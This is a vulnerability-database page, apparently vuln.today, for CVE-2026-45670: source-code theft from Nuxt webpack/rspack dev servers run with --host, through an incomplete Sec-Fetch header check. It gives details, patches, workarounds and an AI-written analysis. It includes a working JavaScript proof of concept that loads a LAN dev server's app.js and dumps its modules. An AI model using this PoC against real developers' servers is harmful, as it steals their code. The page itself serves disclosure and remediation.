Skip to main content

Nuxt webpack-builder CVE-2026-45670

| EUVDEUVD-2026-36419 MEDIUM
Exposed Dangerous Method or Function (CWE-749)
2026-05-19 https://github.com/nuxt/nuxt GHSA-6m52-m754-pw2g
5.9
CVSS 4.0 · Vendor: https://github.com/nuxt/nuxt
Share

Severity by source

Vendor (https://github.com/nuxt/nuxt) PRIMARY
5.9 MEDIUM
CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from Vendor (https://github.com/nuxt/nuxt) · only source for this CVE.

CVSS VectorVendor: https://github.com/nuxt/nuxt

CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Adjacent
Attack Complexity
High
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
CVSS changed
Jun 12, 2026 - 14:22 NVD
5.9 (MEDIUM)
Source Code Evidence Fetched
May 19, 2026 - 16:34 vuln.today
Analysis Generated
May 19, 2026 - 16:34 vuln.today

DescriptionCVE.org

Summary

This is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.

Details

The fix for GHSA-4gf7-ff8x-hq99 relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because these headers are sent by the browsers only for potentially trustworthy origins, the check is able to bypass for non-potentially trustworthy origins.

Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using --host is affected.

PoC

  1. Create a nuxt project with webpack / rspack builder.
  2. Run npm run dev
  3. Open http://localhost:3000
  4. Run the script below in a web site that has a different origin.
  5. You can see the source code output in the document and the devtools console.
js
const script = document.createElement('script')
script.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to
script.addEventListener('load', () => {
  const key = Object.keys(window).find(k => k.startsWith("webpackChunk"))
  for (const page in window[key]) {
    const moduleList = window[key][page][1]
    console.log(moduleList)

    for (const key in moduleList) {
      const p = document.createElement('p')
      const title = document.createElement('strong')
      title.textContent = key
      const code = document.createElement('code')
      code.textContent = moduleList[key].toString()
      p.append(title, ':', document.createElement('br'), code)
      document.body.appendChild(p)
    }
  }
})
document.head.appendChild(script)

(This script is the similar with GHSA-4gf7-ff8x-hq99 except for the script.src and the global variable name)

Impact

Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using --host.

This vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to the local network access restriction feature.

Patches

Fixed in nuxt@4.4.6 and nuxt@3.21.6 by #35051. The dev-middleware same-origin check now falls back to comparing the request's Origin / Referer host against Host when Sec-Fetch-* headers are absent, closing the non-trustworthy-origin bypass.

The fix only ships for the @nuxt/webpack-builder and @nuxt/rspack-builder packages. The default Vite builder was not affected.

Workarounds

If you cannot upgrade immediately:

  • Don't use nuxt dev --host. Bind the dev server to localhost (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.
  • Use Chrome 142+ or another Chromium-based browser that enforces local network access restrictions.
  • Switch to the Vite builder for development.

AnalysisAI

Source code disclosure in Nuxt's webpack and rspack dev server middleware enables a malicious website on the same local network to exfiltrate full application source code when developers run nuxt dev --host. The previous fix for GHSA-4gf7-ff8x-hq99 relied exclusively on Sec-Fetch-Mode and Sec-Fetch-Site headers, which browsers only send from potentially trustworthy origins (HTTPS or localhost) per the W3C Fetch Metadata specification - requests originating from plain HTTP pages on LAN omit these headers entirely, bypassing the same-origin check. A working proof-of-concept is embedded in the vendor advisory; no public exploit identified at time of analysis in CISA KEV.

Technical ContextAI

The vulnerability resides in the dev middleware for @nuxt/webpack-builder and @nuxt/rspack-builder npm packages, classified under CWE-749 (Exposed Dangerous Method or Function). The incomplete prior fix enforced same-origin access control by checking Sec-Fetch-Mode: no-cors and Sec-Fetch-Site: cross-site request headers. However, per the W3C Fetch Metadata specification (https://w3c.github.io/webappsec-fetch-metadata/), browsers only append these headers when the request originates from a 'potentially trustworthy URL' - meaning HTTPS or localhost. When the Nuxt dev server is bound to a LAN IP via --host, cross-origin requests from plain HTTP pages on the same network bypass this check because the browser never sends the Sec-Fetch-* headers. The patch in PR #35051 introduces an isSameOriginRequest() function that falls back to comparing the Origin or Referer header host against the Host header when Sec-Fetch-Site is absent, closing the bypass. The default Vite builder was not affected; only the webpack and rspack builders contain the vulnerable middleware code path.

RemediationAI

The primary fix is to upgrade to nuxt@3.21.6 or nuxt@4.4.6, which deliver patched versions of both @nuxt/webpack-builder and @nuxt/rspack-builder with the corrected same-origin middleware (see PR #35051 at https://github.com/nuxt/nuxt/pull/35051). If immediate upgrade is not feasible, three specific workarounds are available: (1) Stop using nuxt dev --host and bind exclusively to localhost (the default), using SSH tunneling or a reverse proxy for remote device access - this eliminates the attack surface entirely with no functional trade-off for most workflows; (2) Switch to the Vite builder for development, which is not affected and is already the default in current Nuxt versions; (3) Enforce use of Chrome 142+ or another Chromium-based browser with local network access restrictions enabled, which blocks cross-origin requests to LAN IPs at the browser level - note this is a client-side control only and does not protect developers using Firefox or older Chromium versions. Advisory: https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Share

CVE-2026-45670 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy